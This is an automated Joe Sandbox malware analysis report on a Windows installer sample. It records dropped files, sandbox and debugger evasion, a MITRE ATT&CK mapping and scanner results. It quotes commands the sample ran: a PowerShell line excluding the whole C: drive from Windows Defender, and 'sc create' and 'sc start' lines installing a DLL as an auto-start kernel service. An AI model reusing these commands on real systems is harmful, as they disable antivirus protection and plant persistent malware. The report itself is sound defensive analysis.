Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_005FFE90 push eax; ret 11_2_005FFEBE
Source: update.vac.2.drStatic PE information: section name: .=~ entropy: 7.19316283520878
Source: update.vac.7.drStatic PE information: section name: .=~ entropy: 7.19316283520878
Source: hrsw.vbc.7.drStatic PE information: section name: .=~ entropy: 7.19316283520878
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exeFile created: C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpFile created: C:\Program Files (x86)\Windows NT\hrsw.vbcJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpFile created: C:\Program Files (x86)\Windows NT\trash (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpFile created: C:\Users\user\AppData\Local\Temp\is-7RMSI.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpFile created: C:\Users\user\AppData\Local\Temp\is-6ITRF.tmp\update.vacJump to dropped file
Source: C:\Program Files (x86)\Windows NT\7zr.exeFile created: C:\Program Files (x86)\Windows NT\tProtect.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpFile created: C:\Users\user\AppData\Local\Temp\is-7RMSI.tmp\update.vacJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpFile created: C:\Program Files (x86)\Windows NT\is-8UMQQ.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpFile created: C:\Program Files (x86)\Windows NT\7zr.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpFile created: C:\Users\user\AppData\Local\Temp\is-6ITRF.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exeFile created: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpJump to dropped file
Source: C:\Windows\System32\cmd.exe -- Process created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe -- Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp -- Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp -- Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp -- Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp -- System information queried: FirmwareTableInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Window / User API: threadDelayed 6596
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Window / User API: threadDelayed 3178
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp -- Window / User API: threadDelayed 644
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp -- Window / User API: threadDelayed 567
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp -- Window / User API: threadDelayed 604
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp -- Dropped PE file which has not been started: C:\Program Files (x86)\Windows NT\hrsw.vbc
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp -- Dropped PE file which has not been started: C:\Program Files (x86)\Windows NT\trash (copy)
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp -- Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-7RMSI.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp -- Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-6ITRF.tmp\update.vac
Source: C:\Program Files (x86)\Windows NT\7zr.exe -- Dropped PE file which has not been started: C:\Program Files (x86)\Windows NT\tProtect.dll
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp -- Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-7RMSI.tmp\update.vac
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp -- Dropped PE file which has not been started: C:\Program Files (x86)\Windows NT\is-8UMQQ.tmp
Source: C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp -- Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-6ITRF.tmp\_isetup\_setup64.tmp
Source: C:\Program Files (x86)\Windows NT\7zr.exe -- API coverage: 7.3 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3128 -- Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp -- Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe -- Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp -- Code function: 7_2_6C0BAEC0 FindFirstFileA,FindClose, 7_2_6C0BAEC0
Source: C:\Program Files (x86)\Windows NT\7zr.exe -- Code function: 11_2_00566868 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW, 11_2_00566868
Source: C:\Program Files (x86)\Windows NT\7zr.exe -- Code function: 11_2_00567496 __EH_prolog,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW, 11_2_00567496
Source: C:\Program Files (x86)\Windows NT\7zr.exe -- Code function: 11_2_00569C60 GetSystemInfo, 11_2_00569C60
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000002.00000002.2174346795.0000000000A1E000.00000004.00000020.00020000.00000000.sdmp -- Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000002.00000002.2174346795.0000000000A1E000.00000004.00000020.00020000.00000000.sdmp -- Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\.
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp -- Code function: 7_2_6BF43886 NtSetInformationThread 00000000,00000011,00000000,00000000 7_2_6BF43886
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp -- Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp -- Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp -- Code function: 7_2_6C0D0181 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 7_2_6C0D0181
Source: C:\Program Files (x86)\Windows NT\7zr.exe -- Code function: 11_2_005E57D0 GetCurrentProcessId,GetCurrentThreadId,LoadLibraryW,GetProcAddress,FreeLibrary,GetTickCount,QueryPerformanceCounter,GetTickCount, 11_2_005E57D0
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp -- Code function: 7_2_6C0D9D35 mov eax, dword ptr fs:[00000030h] 7_2_6C0D9D35
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp -- Code function: 7_2_6C0D9D66 mov eax, dword ptr fs:[00000030h] 7_2_6C0D9D66
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp -- Code function: 7_2_6C0CF17D mov eax, dword ptr fs:[00000030h] 7_2_6C0CF17D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp -- Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp -- Code function: 7_2_6C0C8CBD SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 7_2_6C0C8CBD

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp -- Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: tProtect.dll.13.dr -- Static PE information: Found potential injection code
Source: C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp -- Process created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe" /VERYSILENT
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp -- Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe -- Process created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\cmd.exe -- Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpCode function: 7_2_6C197700 cpuid 7_2_6C197700
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_0056AB2A GetSystemTimeAsFileTime,11_2_0056AB2A
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_00600090 GetVersion,11_2_00600090
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000007.00000002.2334194076.00000000011F3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Program Files\Windows Defender\MsMpEng.exe
Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: 2 Command and Scripting Interpreter; 1 Service Execution; 1 Native API; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
Persistence: 1 Windows Service; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Privilege Escalation: 1 Access Token Manipulation; 1 Windows Service; 111 Process Injection; 1 DLL Side-Loading; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Defense Evasion: 11 Masquerading; 1 Disable or Modify Tools; 231 Virtualization/Sandbox Evasion; 1 Access Token Manipulation; 111 Process Injection; 1 Deobfuscate/Decode Files or Information; 3 Obfuscated Files or Information; 1 Software Packing; 1 DLL Side-Loading
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: 1 System Time Discovery; 331 Security Software Discovery; 231 Virtualization/Sandbox Evasion; 2 Process Discovery; 1 Application Window Discovery; 2 System Owner/User Discovery; 3 File and Directory Discovery; 25 System Information Discovery; Network Sniffing
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
Collection: 1 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Command and Control: 1 Encrypted Channel; Junk Data; Steganography; Protocol Impersonation; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Impact: 1 System Shutdown/Reboot; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
Behavior Graph ID: 1579778, Sample: #U5b89#U88c5#U52a9#U624b_2.0.6.exe, Startdate: 23/12/2024, Architecture: WINDOWS, Score: 84

Signatures attached to the sample: Multi AV Scanner detection for submitted file; Found driver which could be used to inject code into processes; PE file contains section with special chars; Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Process tree (dropped files and signatures are listed under the process they belong to):
#U5b89#U88c5#U52a9#U624b_2.0.6.exe
  dropped: C:\...\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp (PE32)
  #U5b89#U88c5#U52a9#U624b_2.0.6.tmp
    dropped: C:\Users\user\AppData\Local\...\update.vac (PE32); C:\Users\user\AppData\Local\...\_setup64.tmp (PE32+)
    signature: Adds a directory exclusion to Windows Defender
    #U5b89#U88c5#U52a9#U624b_2.0.6.exe
      dropped: C:\...\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp (PE32)
      #U5b89#U88c5#U52a9#U624b_2.0.6.tmp
        dropped: C:\Users\user\AppData\Local\...\update.vac (PE32); C:\Program Files (x86)\...\trash (copy) (PE32+); C:\Program Files (x86)\...\is-8UMQQ.tmp (PE32+); 3 other files (1 malicious)
        signatures: Query firmware table information (likely to detect VMs); Protects its processes via BreakOnTermination flag; Hides threads from debuggers; Contains functionality to hide a thread from the debugger
        7zr.exe
          dropped: C:\Program Files (x86)\...\tProtect.dll (PE32+)
          conhost.exe
        7zr.exe
          conhost.exe
    powershell.exe
      signature: Loading BitLocker PowerShell Module
      conhost.exe
      WmiPrvSE.exe
cmd.exe
  sc.exe
    conhost.exe
cmd.exe
  sc.exe
    conhost.exe
30 other processes
  sc.exe (3 shown)
    conhost.exe
  26 other processes
    conhost.exe
    25 other processes

Source | Detection | Scanner
#U5b89#U88c5#U52a9#U624b_2.0.6.exe | 0% | ReversingLabs
#U5b89#U88c5#U52a9#U624b_2.0.6.exe | 7% | Virustotal
Source | Detection | Scanner
C:\Program Files (x86)\Windows NT\7zr.exe | 0% | ReversingLabs
C:\Program Files (x86)\Windows NT\hrsw.vbc | 11% | ReversingLabs
C:\Program Files (x86)\Windows NT\is-8UMQQ.tmp | 0% | ReversingLabs
C:\Program Files (x86)\Windows NT\tProtect.dll | 9% | ReversingLabs
C:\Program Files (x86)\Windows NT\trash (copy) | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\is-6ITRF.tmp\_isetup\_setup64.tmp | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\is-6ITRF.tmp\update.vac | 11% | ReversingLabs
C:\Users\user\AppData\Local\Temp\is-7RMSI.tmp\_isetup\_setup64.tmp | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\is-7RMSI.tmp\update.vac | 11% | ReversingLabs
C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp | 0% | ReversingLabs
No Antivirus matches
No Antivirus matches
No Antivirus matches
No contacted domains info
Name | Source | Malicious | Reputation
Name: https://aria2.github.io/Usage:
  Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000002.00000003.2159459054.0000000003F69000.00000004.00001000.00020000.00000000.sdmp, is-8UMQQ.tmp.7.dr
  Malicious: false, Reputation: high
Name: https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
  Source: #U5b89#U88c5#U52a9#U624b_2.0.6.exe
  Malicious: false, Reputation: high
Name: https://github.com/aria2/aria2/issuesReport
  Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000002.00000003.2159459054.0000000003F69000.00000004.00001000.00020000.00000000.sdmp, is-8UMQQ.tmp.7.dr
  Malicious: false, Reputation: high
Name: http://www.metalinker.org/
  Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000002.00000003.2159459054.0000000003F69000.00000004.00001000.00020000.00000000.sdmp, is-8UMQQ.tmp.7.dr
  Malicious: false, Reputation: high
Name: https://www.remobjects.com/ps
  Source: #U5b89#U88c5#U52a9#U624b_2.0.6.exe, 00000000.00000003.2066138052.0000000002DC0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.6.exe, 00000000.00000003.2066627306.000000007F7BB000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000002.00000000.2069328889.0000000000AF1000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000007.00000000.2162499297.0000000000FFD000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.6.tmp.0.dr, #U5b89#U88c5#U52a9#U624b_2.0.6.tmp.6.dr
  Malicious: false, Reputation: high
Name: https://aria2.github.io/
  Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000002.00000003.2159459054.0000000003F69000.00000004.00001000.00020000.00000000.sdmp, is-8UMQQ.tmp.7.dr
  Malicious: false, Reputation: high
Name: https://github.com/aria2/aria2/issues
  Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000002.00000003.2159459054.0000000003F69000.00000004.00001000.00020000.00000000.sdmp, is-8UMQQ.tmp.7.dr
  Malicious: false, Reputation: high
Name: https://www.innosetup.com/
  Source: #U5b89#U88c5#U52a9#U624b_2.0.6.exe, 00000000.00000003.2066138052.0000000002DC0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.6.exe, 00000000.00000003.2066627306.000000007F7BB000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000002.00000000.2069328889.0000000000AF1000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000007.00000000.2162499297.0000000000FFD000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.6.tmp.0.dr, #U5b89#U88c5#U52a9#U624b_2.0.6.tmp.6.dr
  Malicious: false, Reputation: high
Name: http://www.metalinker.org/basic_string::_M_construct
  Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000002.00000003.2159459054.0000000003F69000.00000004.00001000.00020000.00000000.sdmp, is-8UMQQ.tmp.7.dr
  Malicious: false, Reputation: high
                    No contacted IP infos
                    Joe Sandbox version:41.0.0 Charoite
                    Analysis ID:1579778
                    Start date and time:2024-12-23 09:09:48 +01:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 10m 34s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
